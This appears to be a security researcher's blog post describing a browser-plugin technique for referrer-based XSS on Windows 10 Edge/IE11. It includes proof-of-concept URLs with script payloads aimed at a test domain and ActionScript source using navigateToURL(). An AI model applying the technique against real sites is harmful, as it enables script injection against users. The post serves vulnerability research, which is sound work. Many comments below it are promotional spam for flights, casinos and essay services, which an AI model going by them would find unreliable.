The following page writes the
https://vulnerabledoma.in/xss_referrer
HTTP_REFERER and document.referrer directly:https://vulnerabledoma.in/xss_referrer
Previously IE/Edge did not encode the
"<> characters in the referrer string. So, we could XSS on that page from the following PoC:https://l0.cm/xss_referrer_oldpoc.html?<script>alert("1")</script>
But since the Windows 10 anniversary update, IE11/Edge encodes it. You will get the following encoded string from that page:
HTTP_REFERER: https://l0.cm/xss_referrer_oldpoc.html?%3Cscript%3Ealert(%221%22)%3C/script%3EToo bad!
document.referrer: https://l0.cm/xss_referrer_oldpoc.html?%3Cscript%3Ealert(%221%22)%3C/script%3E
Of course, we can still use Win8.1/7 IE11. But also we want to XSS on Win10, don't you? :D
Today, I would like to introduce a small technique, XSS using the referrer on latest Win10 Edge/IE11.
The technique is very simple. You can easily include
"<> string into the referrer if you send the request from Flash's navigateToURL() method, like this:https://l0.cm/xss_referrer.swf?<script>alert(1)</script>
The ActionScript code is here:
package {As you can see the access result, we can XSS via the
import flash.display.Sprite;
import flash.net.URLRequest;
import flash.net.navigateToURL;
public class xss_referrer extends Sprite{
public function xss_referrer() {
var url:URLRequest = new URLRequest("https://vulnerabledoma.in/xss_referrer");
navigateToURL(url, "_self");
}
}
}
Referer request header. But sadly, we cannot XSS via the document.referrer property because it becomes empty. Dang :pFYI, also I can reproduce it via the submitForm() method of JavaScript for Acrobat API.
I confirmed it on Win10 IE11 with Adobe Reader plugin.
PoC is here:
https://l0.cm/xss_referrer.pdf?<script>alert(1)</script>
It seems that the request via plugins is not considered.
That's it. It might be helpful in some cases :)
Thanks!
To do Not Pressure OR Anything, But Have Ever This considered post there is statement PT Lampung Service this is a
ReplyDeleteService HP Bandar Lampung whose looking to do day
Service iPhone Lampung to this looking then to that is
Jasa Kursus Service HP I will try it.
Jasa Kursus Service HP They have jumping places and so that the device other kid's activity.Youtuber Lampung , Thanks ! Visit Back.
Aivivu chuyên vé máy bay, tham khảo
ReplyDeletecách săn vé máy bay giá rẻ tết 2021
ve may bay di my gia re
vé máy bay đi Pháp
vé máy bay đi hàn quốc khứ hồi vietnam airline
vietnam airlines nhật bản
vé máy bay đi anh bao nhiêu tiền
đại lý vé máy bay giá rẻ tại tphcm
Mua vé máy bay tại Aivivu, tham khảo
ReplyDeletevé máy bay đi Mỹ khứ hồi
các chuyến bay từ mỹ về việt nam hôm nay
khi nào có chuyến bay từ anh về việt nam
giá vé máy bay từ pháp về việt nam
That's for sure. He could become the future Paul Scholes at Nachester United, he has the outstanding quality of a midfielder to be a great player.”
ReplyDeleteA bizarre penalty took place in the FA รีวิวคาสิโน
Cup second round when the referees decided to give non-league side Ebbsfleet the penalty despite their players stubbornly falling on their own. Plus, it also contributed to Ebbsfleet's qualification.
What an interesting article! I'm glad i finally found what i was looking for.
ReplyDelete온라인경마
경마사이트
Well done! Also visit my site 토토
ReplyDeleteThis an amazing reads, it shows that you actually know what you are talking about, thanks a lot for sharing the elucidate contents. 카지노
ReplyDeleteThank you for this work.. Planning to stay in Kenya further for some reasons, however, you must apply for Kenya visa extension then online and check visa required for Kenya.
ReplyDeleteWow.. Very informative article thanks for sharing please keep it up.. You can apply for an India tourist visa urgent in some case of emergency and you can also apply for an India visa super urgent, it takes less as compared to sticker visa.
ReplyDeleteBK8 ของเราคือแบรนด์ คาสิโนออนไลน์ (Casino Online) ที่ใหญ่และดีที่สุดใน ประเทศไทย ทั้งยังสามารถครองใจผู้เล่นมาแล้วหลายล้านรายทั่วประเทศในแถบ เอเชีย เป็นที่รู้จักกันดีในฐานะแบรนด์ การพนัน ชั้นนำ มี เกมคาสิโน หลากหลายที่พร้อมมอบประสบการณ์สุดพิเศษแก่ผู้เล่นแต่ละราย ตอบสนอง การเดิมพัน ได้ง่ายเพียงปลายนิ้วสัมผัสผ่าน คอมพิวเตอร์, แม็บเล็ต และ โทรศัพท์มือถือ ทั้งยังมี โปรโมชั่น, โบนัส และเงินรางวัลสุดพิเศษอีกมากมาย เข้าไปเดิมพันและทำให้วันของคุณเป็นวันที่แตกต่างได้เลยวันนี้!สมัคร bk8thai
ReplyDeleteAtoz Top News is considered one of the best recognized and popular websites providing high-quality information about the latest technology and gadgets. In addition, AtoZ Top News is one of the top technology-related websites on the internet and one of the most popular technology blogs online. It is primarily a source of articles related to portals on the internet and the latest technology reviews, news, and product reviews.
ReplyDeleteThe whole data is related to window10, the best window for marketing, but I wouldn't say I like to use it for my work because I have been using window7, which is very easy for new marketers who do not have enough experience in SEO. dissertation writing services
ReplyDeleteIt is difficult to choose the best someone to write my assignment because of the vast range of websites available on the internet. They are just as good as the others and you have to make sure that you are getting the best assignment help.
ReplyDeleteThis comment has been removed by the author.
ReplyDeleteThis comment has been removed by the author.
ReplyDeletephòng vé Eva Air tại hà nội
ReplyDeleteđổi vé máy bay China Airlines có mất phí không
hướng dẫn mua thêm hành lý Japan Airlines
Though I've read a few articles on similar subjects, I believe your writing is the clearest I've ever come across. I want to post about and link to your content on my site, dinosaur game
ReplyDelete